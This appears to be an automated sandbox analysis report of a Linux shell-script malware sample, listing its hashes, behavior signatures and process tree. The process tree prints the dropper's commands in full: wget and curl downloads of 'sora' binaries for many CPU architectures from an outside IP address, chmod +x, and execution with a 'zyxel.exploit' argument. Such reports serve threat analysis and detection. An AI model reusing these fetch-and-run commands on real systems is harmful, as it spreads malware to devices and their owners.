Analysis
-
max time kernel
2s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
18/10/2024, 03:03
Static task
static1
Behavioral task
behavioral1
Sample
ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
-
Size
2KB
-
MD5
eb7a4e59f642cd5475876f6ef1a09d3a
-
SHA1
9232db0ebfe888067cc85a32b786a7ce41be0a6f
-
SHA256
ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670
-
SHA512
9393df90cc409e4f6ee6a2fc7df960123823ca22c25f01ae4e2ab094f74f71f0565925aa0384a5e84f4b15792d89317af71b1f223fa7fdd340b4404f9a25c6b8
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1509 chmod 1527 chmod 1515 chmod 1533 chmod 1539 chmod 1545 chmod 1563 chmod 1569 chmod 1503 chmod 1521 chmod 1551 chmod 1491 chmod 1497 chmod 1557 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 1492 robben /tmp/robben 1498 robben /tmp/robben 1504 robben /tmp/robben 1510 robben /tmp/robben 1516 robben /tmp/robben 1522 robben /tmp/robben 1528 robben /tmp/robben 1534 robben /tmp/robben 1540 robben /tmp/robben 1546 robben /tmp/robben 1552 robben /tmp/robben 1558 robben /tmp/robben 1564 robben /tmp/robben 1570 robben -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1494 wget 1495 curl 1496 cat -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/robben ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
Processes
-
/tmp/ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh/tmp/ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh1⤵
- Writes file to tmp directory
PID:1483 -
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x862⤵PID:1484
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x862⤵PID:1486
-
-
/bin/catcat sora.x862⤵PID:1490
-
-
/bin/chmodchmod +x config-err-mMHPPJ ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh netplan_dth_3rkp robben snap-private-tmp ssh-cKZATj5ZvKQc systemd-private-1a2efd7c1374472caef0132c0de6b62b-bolt.service-N6M85w systemd-private-1a2efd7c1374472caef0132c0de6b62b-colord.service-3mNuyC systemd-private-1a2efd7c1374472caef0132c0de6b62b-ModemManager.service-Rf3sVV systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-resolved.service-3ebLp9 systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-timedated.service-d8mDV42⤵
- File and Directory Permissions Modification
PID:1491
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:1492
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:1494
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:1495
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:1496
-
-
/bin/chmodchmod +x config-err-mMHPPJ ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh netplan_dth_3rkp robben snap-private-tmp ssh-cKZATj5ZvKQc systemd-private-1a2efd7c1374472caef0132c0de6b62b-bolt.service-N6M85w systemd-private-1a2efd7c1374472caef0132c0de6b62b-colord.service-3mNuyC systemd-private-1a2efd7c1374472caef0132c0de6b62b-ModemManager.service-Rf3sVV systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-resolved.service-3ebLp9 systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-timedated.service-d8mDV42⤵
- File and Directory Permissions Modification
PID:1497
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:1498
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x86_642⤵PID:1500
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x86_642⤵PID:1501
-
-
/bin/catcat sora.x86_642⤵PID:1502
-
-
/bin/chmodchmod +x config-err-mMHPPJ ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh netplan_dth_3rkp robben snap-private-tmp ssh-cKZATj5ZvKQc systemd-private-1a2efd7c1374472caef0132c0de6b62b-bolt.service-N6M85w systemd-private-1a2efd7c1374472caef0132c0de6b62b-colord.service-3mNuyC systemd-private-1a2efd7c1374472caef0132c0de6b62b-ModemManager.service-Rf3sVV systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-resolved.service-3ebLp9 systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-timedated.service-d8mDV42⤵
- File and Directory Permissions Modification
PID:1503
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:1504
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i4682⤵PID:1506
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i4682⤵PID:1507
-
-
/bin/catcat sora.i4682⤵PID:1508
-
-
/bin/chmodchmod +x config-err-mMHPPJ ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh netplan_dth_3rkp robben snap-private-tmp ssh-cKZATj5ZvKQc systemd-private-1a2efd7c1374472caef0132c0de6b62b-bolt.service-N6M85w systemd-private-1a2efd7c1374472caef0132c0de6b62b-colord.service-3mNuyC systemd-private-1a2efd7c1374472caef0132c0de6b62b-ModemManager.service-Rf3sVV systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-resolved.service-3ebLp9 systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-timedated.service-d8mDV42⤵
- File and Directory Permissions Modification
PID:1509
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:1510
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i6862⤵PID:1512
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i6862⤵PID:1513
-
-
/bin/catcat sora.i6862⤵PID:1514
-
-
/bin/chmodchmod +x config-err-mMHPPJ ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh netplan_dth_3rkp robben snap-private-tmp ssh-cKZATj5ZvKQc systemd-private-1a2efd7c1374472caef0132c0de6b62b-bolt.service-N6M85w systemd-private-1a2efd7c1374472caef0132c0de6b62b-colord.service-3mNuyC systemd-private-1a2efd7c1374472caef0132c0de6b62b-ModemManager.service-Rf3sVV systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-resolved.service-3ebLp9 systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-timedated.service-d8mDV42⤵
- File and Directory Permissions Modification
PID:1515
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:1516
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mpsl2⤵PID:1518
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mpsl2⤵PID:1519
-
-
/bin/catcat sora.mpsl2⤵PID:1520
-
-
/bin/chmodchmod +x config-err-mMHPPJ ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh netplan_dth_3rkp robben snap-private-tmp ssh-cKZATj5ZvKQc systemd-private-1a2efd7c1374472caef0132c0de6b62b-bolt.service-N6M85w systemd-private-1a2efd7c1374472caef0132c0de6b62b-colord.service-3mNuyC systemd-private-1a2efd7c1374472caef0132c0de6b62b-ModemManager.service-Rf3sVV systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-resolved.service-3ebLp9 systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-timedated.service-d8mDV42⤵
- File and Directory Permissions Modification
PID:1521
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:1522
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm42⤵PID:1524
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm42⤵PID:1525
-
-
/bin/catcat sora.arm42⤵PID:1526
-
-
/bin/chmodchmod +x config-err-mMHPPJ ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh netplan_dth_3rkp robben snap-private-tmp ssh-cKZATj5ZvKQc systemd-private-1a2efd7c1374472caef0132c0de6b62b-bolt.service-N6M85w systemd-private-1a2efd7c1374472caef0132c0de6b62b-colord.service-3mNuyC systemd-private-1a2efd7c1374472caef0132c0de6b62b-ModemManager.service-Rf3sVV systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-resolved.service-3ebLp9 systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-timedated.service-d8mDV42⤵
- File and Directory Permissions Modification
PID:1527
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:1528
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm52⤵PID:1530
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm52⤵PID:1531
-
-
/bin/catcat sora.arm52⤵PID:1532
-
-
/bin/chmodchmod +x config-err-mMHPPJ ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh netplan_dth_3rkp robben snap-private-tmp ssh-cKZATj5ZvKQc systemd-private-1a2efd7c1374472caef0132c0de6b62b-bolt.service-N6M85w systemd-private-1a2efd7c1374472caef0132c0de6b62b-colord.service-3mNuyC systemd-private-1a2efd7c1374472caef0132c0de6b62b-ModemManager.service-Rf3sVV systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-resolved.service-3ebLp9 systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-timedated.service-d8mDV42⤵
- File and Directory Permissions Modification
PID:1533
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:1534
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm62⤵PID:1536
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm62⤵PID:1537
-
-
/bin/catcat sora.arm62⤵PID:1538
-
-
/bin/chmodchmod +x config-err-mMHPPJ ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh netplan_dth_3rkp robben snap-private-tmp ssh-cKZATj5ZvKQc systemd-private-1a2efd7c1374472caef0132c0de6b62b-bolt.service-N6M85w systemd-private-1a2efd7c1374472caef0132c0de6b62b-colord.service-3mNuyC systemd-private-1a2efd7c1374472caef0132c0de6b62b-ModemManager.service-Rf3sVV systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-resolved.service-3ebLp9 systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-timedated.service-d8mDV42⤵
- File and Directory Permissions Modification
PID:1539
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:1540
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm72⤵PID:1542
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm72⤵PID:1543
-
-
/bin/catcat sora.arm72⤵PID:1544
-
-
/bin/chmodchmod +x config-err-mMHPPJ ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh netplan_dth_3rkp robben snap-private-tmp ssh-cKZATj5ZvKQc systemd-private-1a2efd7c1374472caef0132c0de6b62b-bolt.service-N6M85w systemd-private-1a2efd7c1374472caef0132c0de6b62b-colord.service-3mNuyC systemd-private-1a2efd7c1374472caef0132c0de6b62b-ModemManager.service-Rf3sVV systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-resolved.service-3ebLp9 systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-timedated.service-d8mDV42⤵
- File and Directory Permissions Modification
PID:1545
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:1546
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc2⤵PID:1548
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc2⤵PID:1549
-
-
/bin/catcat sora.ppc2⤵PID:1550
-
-
/bin/chmodchmod +x config-err-mMHPPJ ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh netplan_dth_3rkp robben snap-private-tmp ssh-cKZATj5ZvKQc systemd-private-1a2efd7c1374472caef0132c0de6b62b-bolt.service-N6M85w systemd-private-1a2efd7c1374472caef0132c0de6b62b-colord.service-3mNuyC systemd-private-1a2efd7c1374472caef0132c0de6b62b-ModemManager.service-Rf3sVV systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-resolved.service-3ebLp9 systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-timedated.service-d8mDV42⤵
- File and Directory Permissions Modification
PID:1551
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:1552
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc440fp2⤵PID:1554
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc440fp2⤵PID:1555
-
-
/bin/catcat sora.ppc440fp2⤵PID:1556
-
-
/bin/chmodchmod +x config-err-mMHPPJ ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh netplan_dth_3rkp robben snap-private-tmp ssh-cKZATj5ZvKQc systemd-private-1a2efd7c1374472caef0132c0de6b62b-bolt.service-N6M85w systemd-private-1a2efd7c1374472caef0132c0de6b62b-colord.service-3mNuyC systemd-private-1a2efd7c1374472caef0132c0de6b62b-ModemManager.service-Rf3sVV systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-resolved.service-3ebLp9 systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-timedated.service-d8mDV42⤵
- File and Directory Permissions Modification
PID:1557
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:1558
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.m68k2⤵PID:1560
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.m68k2⤵PID:1561
-
-
/bin/catcat sora.m68k2⤵PID:1562
-
-
/bin/chmodchmod +x config-err-mMHPPJ ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh netplan_dth_3rkp robben snap-private-tmp ssh-cKZATj5ZvKQc systemd-private-1a2efd7c1374472caef0132c0de6b62b-bolt.service-N6M85w systemd-private-1a2efd7c1374472caef0132c0de6b62b-colord.service-3mNuyC systemd-private-1a2efd7c1374472caef0132c0de6b62b-ModemManager.service-Rf3sVV systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-resolved.service-3ebLp9 systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-timedated.service-d8mDV42⤵
- File and Directory Permissions Modification
PID:1563
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:1564
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.sh42⤵PID:1566
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.sh42⤵PID:1567
-
-
/bin/catcat sora.sh42⤵PID:1568
-
-
/bin/chmodchmod +x config-err-mMHPPJ ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh netplan_dth_3rkp robben snap-private-tmp ssh-cKZATj5ZvKQc systemd-private-1a2efd7c1374472caef0132c0de6b62b-bolt.service-N6M85w systemd-private-1a2efd7c1374472caef0132c0de6b62b-colord.service-3mNuyC systemd-private-1a2efd7c1374472caef0132c0de6b62b-ModemManager.service-Rf3sVV systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-resolved.service-3ebLp9 systemd-private-1a2efd7c1374472caef0132c0de6b62b-systemd-timedated.service-d8mDV42⤵
- File and Directory Permissions Modification
PID:1569
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:1570
-